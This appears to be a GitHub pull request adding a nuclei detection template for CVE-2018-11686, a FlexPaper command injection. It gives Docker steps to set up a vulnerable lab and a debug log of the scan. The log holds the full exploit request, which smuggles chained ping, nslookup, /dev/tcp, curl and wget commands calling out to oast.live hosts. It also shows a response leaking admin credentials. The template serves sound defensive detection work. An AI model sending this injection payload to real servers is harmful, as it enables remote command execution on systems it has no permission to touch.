PR
Add CVE-2018-11686
projectdiscovery/nuclei-templates#12389

Template / PR Information

Template for https://github.com/projectdiscovery/nuclei-templates/issues/12369 To create vulnerable instance create Dockerfile with following content:

FROM php:5.6-apache-stretch

COPY --chown=www-data:www-data ./flexpaper/ /var/www/html/

Get flexpaper:

git clone https://github.com/dw250100785/FlexPaper_2.1.2.git flexpaper

Build and run:

docker build -t flexpaper .

docker run --rm -p 8888:80 flexpaper

Run nuclei

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Debug:

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml -debug



                     __     _

   ____  __  _______/ /__  (_)

  / __ \/ / / / ___/ / _ \/ /

 / / / / /_/ / /__/ /  __/ /

/_/ /_/\__,_/\___/_/\___/_/   v3.4.5



                projectdiscovery.io



[INF] Current nuclei version: v3.4.5 (latest)

[INF] Current nuclei-templates version: v10.2.3 (latest)

[WRN] Scan results upload to cloud is disabled.

[INF] New templates added in latest release: 105

[INF] Templates loaded for current scan: 1

[WRN] Loading 1 unsigned templates for scan. Use with caution.

[INF] Targets loaded for current scan: 1

[INF] Using Interactsh Server: oast.live

[INF] [CVE-2018-11686] Dumped HTTP request for http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b



GET /php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b HTTP/1.1

Host: 127.0.0.1:8888

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15

Connection: close

Accept: */*

Accept-Language: en

Accept-Encoding: gzip



[DBG] [CVE-2018-11686] Dumped HTTP response http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b



HTTP/1.1 200 OK

Connection: close

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Type: text/html; charset=UTF-8

Date: Tue, 17 Jun 2025 04:26:46 GMT

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Pragma: no-cache

Server: Apache/2.4.25 (Debian)

Set-Cookie: PHPSESSID=d17c925b4718d50b022b52ed5fb7a29e; path=/

Vary: Accept-Encoding

X-Powered-By: PHP/5.6.40





    <!--







    {

    "allowcache":true,

    "splitmode":"false",

    "path.pdf":"G:\\wamp\\www\\FlexPaper\\pdf\\",

    "path.swf":"G:\\wamp\\www\\FlexPaper\\docs\\",

    "renderingorder.primary":null,

    "renderingorder.secondary":null,

    "cmd.conversion.singledoc":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",

    "cmd.conversion.splitpages":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}_%.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",

    "cmd.conversion.renderpage":"swfrender \"{path.swf}{swffile}\" -p {page} -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",

    "cmd.conversion.rendersplitpage":"swfrender \"{path.swf}{swffile}\" -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",

    "cmd.conversion.jsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress \"{path.swf}{pdffile}.js\"",

    "cmd.conversion.splitjsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress -split 10 \"{path.swf}{pdffile}_%.js\"",

    "cmd.searching.extracttext":"swfstrings \"{swffile}\"",

    "cmd.query.swfwidth":"swfdump {swffile} -X",

    "cmd.query.swfheight":"swfdump \"{swffile}\" -Y",

    "pdf2swf":false,

    "admin.username":"admin",

    "admin.password":"123456",

    "licensekey":"gpl"

    }

    -->





    <br />

<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/php/lib/config.php:31) in <b>/var/www/html/php/setup.php</b> on line <b>140</b><br />

[d18esui1sadpsj315g70qj597ihyxpmdf] Received DNS interaction from 172.69.49.15 at 2025-06-17 04:26:46

------------

DNS Request

------------



;; opcode: QUERY, status: NOERROR, id: 62173

;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1



;; OPT PSEUDOSECTION:

; EDNS: version 0; flags: do; udp: 1452



;; QUESTION SECTION:

;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA







------------

DNS Response

------------



;; opcode: QUERY, status: NOERROR, id: 62173

;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2



;; QUESTION SECTION:

;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA



;; ANSWER SECTION:

d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      A       178.128.210.172



;; AUTHORITY SECTION:

d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns1.oast.live.

d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns2.oast.live.



;; ADDITIONAL SECTION:

ns1.oast.live.  3600    IN      A       178.128.210.172

ns2.oast.live.  3600    IN      A       178.128.210.172





[CVE-2018-11686:word-1] [http] [critical] http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b

[INF] Scan completed in 18.145644091s. 1 matches found.

/claim https://github.com/projectdiscovery/nuclei-templates/issues/12369

Additional References:

Claim

Total prize pool $50
Total paid $50
Status Approved
Submitted June 17, 2025
Last updated June 17, 2025

Contributors

PS

pszyszkowski

@pszyszkowski

 100%

Sponsors

PR

ProjectDiscovery

@projectdiscovery

$50 paid